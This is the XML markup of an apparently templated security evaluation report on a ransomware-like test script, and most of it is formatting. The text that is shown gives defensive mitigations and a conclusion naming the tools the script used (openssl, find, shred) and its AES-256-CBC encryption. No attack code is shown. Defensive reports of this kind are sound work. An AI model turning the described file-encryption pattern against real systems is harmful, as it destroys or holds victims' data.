        <w:t>Based on the evaluation, the following actions are recommended to mitigate similar threats in production environments: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2126" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:start="2126" w:end="1417" w:hanging="283"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
        </w:rPr>
        <w:t>Implement application whitelisting:</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> Restrict execution of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>openssl</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> for non-admin users via </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>apparmor</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>selinux</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">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2126" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:start="2126" w:end="1417" w:hanging="283"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
        </w:rPr>
        <w:t>Enable file auditing:</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> Monitor mass deletions and encryption operations in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>/home</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> directories using </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>auditd</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> rules.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2126" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:start="2126" w:end="1417" w:hanging="283"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
        </w:rPr>
        <w:t>Deploy behavioral detection:</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> Use EDR tools to flag processes that read many files and write encrypted output.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2126" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:start="2126" w:end="1417" w:hanging="283"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
        </w:rPr>
        <w:t>Backup strategy:</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> Maintain offline, immutable backups with versioning to recover encrypted data without paying ransom.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2126" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:ind w:start="2126" w:end="1417" w:hanging="283"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
        </w:rPr>
        <w:t>User training:</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> Educate users on identifying phishing attempts that may deliver such scripts. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>6. Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The tested script demonstrates a realistic ransomware-like behavior pattern using standard system tools (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>openssl</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>find</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>shred</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>). While the encryption itself is cryptographically sound (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
        </w:rPr>
        <w:t>AES-256-CBC</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">), the script's reliance on local key storage and lack of persistence mechanisms make it less sophisticated than real-world ransomware. However, it serves as an effective test case for evaluating an organization's </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
        </w:rPr>
        <w:t>detection and response capabilities</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> against file-encrypting malware. All test artifacts have been securely deleted and the sandbox environment has been reverted to a clean snapshot.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
        </w:rPr>
        <w:t>Report prepared by {PLACEHOLDER_EVALUATOR_NAME} for {PLACEHOLDER_DEPARTMENT}.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="600" w:after="200"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
          <w:bdr w:val="single" w:sz="2" w:space="12" w:color="DDDDDD"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
          <w:bdr w:val="single" w:sz="2" w:space="12" w:color="DDDDDD"/>
        </w:rPr>
        <w:t>This document is confidential and intended for authorized security personnel only.</w:t>
        <w:br/>
        <w:t xml:space="preserve">Document ID: SEC-EVAL-{PLACEHOLDER_ID} | Version 1.0 | Expires: {PLACEHOLDER_EXPIRY_DATE}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altName w:val="Arial"/>
    <w:charset w:val="01" w:characterSet="utf-8"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="default"/>
  </w:font>
  <w:font w:name="Liberation Sans Unicode MS">
    <w:charset w:val="01" w:characterSet="utf-8"/>
    <w:family w:val="auto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Courier New">
    <w:altName w:val="monospace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84" w:before="1417" w:after="1417"/>
      <w:ind w:start="1417" w:end="1417" w:hanging="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri;Arial;sans-serif" w:hAnsi="Calibri;Arial;sans-serif" w:eastAsia="Calibri;Arial;sans-serif" w:cs="Calibri;Arial;sans-serif"/>
      <w:color w:val="1A1A1A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pBdr>
        <w:bottom w:val="single" w:sz="18" w:space="8" w:color="B30000"/>
      </w:pBdr>
      <w:spacing w:before="480" w:after="283"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Liberation Sans Unicode MS" w:hAnsi="Liberation Sans Unicode MS"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="B30000"/>
      <w:sz w:val="44"/>
      <w:szCs w:val="44"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading2">
    <w:name w:val="Heading 2"/>
    <w:basedOn w:val="Heading"/>
    <w:next w:val="TextBody"/>
    <w:qFormat/>
    <w:pPr>
      <w:pBdr>
        <w:bottom w:val="single" w:sz="2" w:space="4" w:color="CCCCCC"/>
      </w:pBdr>
      <w:spacing w:before="400" w:after="120"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif" w:eastAsia="DejaVu Sans" w:cs="Noto Sans Devanagari"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="333333"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading3">
    <w:name w:val="Heading 3"/>
    <w:basedOn w:val="Heading"/>
    <w:next w:val="TextBody"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:before="320" w:after="120"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif" w:eastAsia="DejaVu Sans" w:cs="Noto Sans Devanagari"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="555555"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6235" w:leader="none"/>
        <w:tab w:val="right" w:pos="11054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6235" w:leader="none"/>
        <w:tab w:val="right" w:pos="11054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6236" w:leader="none"/>
        <w:tab w:val="right" w:pos="11055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TextBody"/>
    <w:pPr/>
    <w:rPr>
      <w:rFonts w:cs="Noto Sans Devanagari"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TextBody">
    <w:name w:val="Body Text"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:spacing w:before="0" w:after="200"/>
      <w:jc w:val="both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2C3E50" w:val="clear"/>
      <w:jc w:val="start"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:color w:va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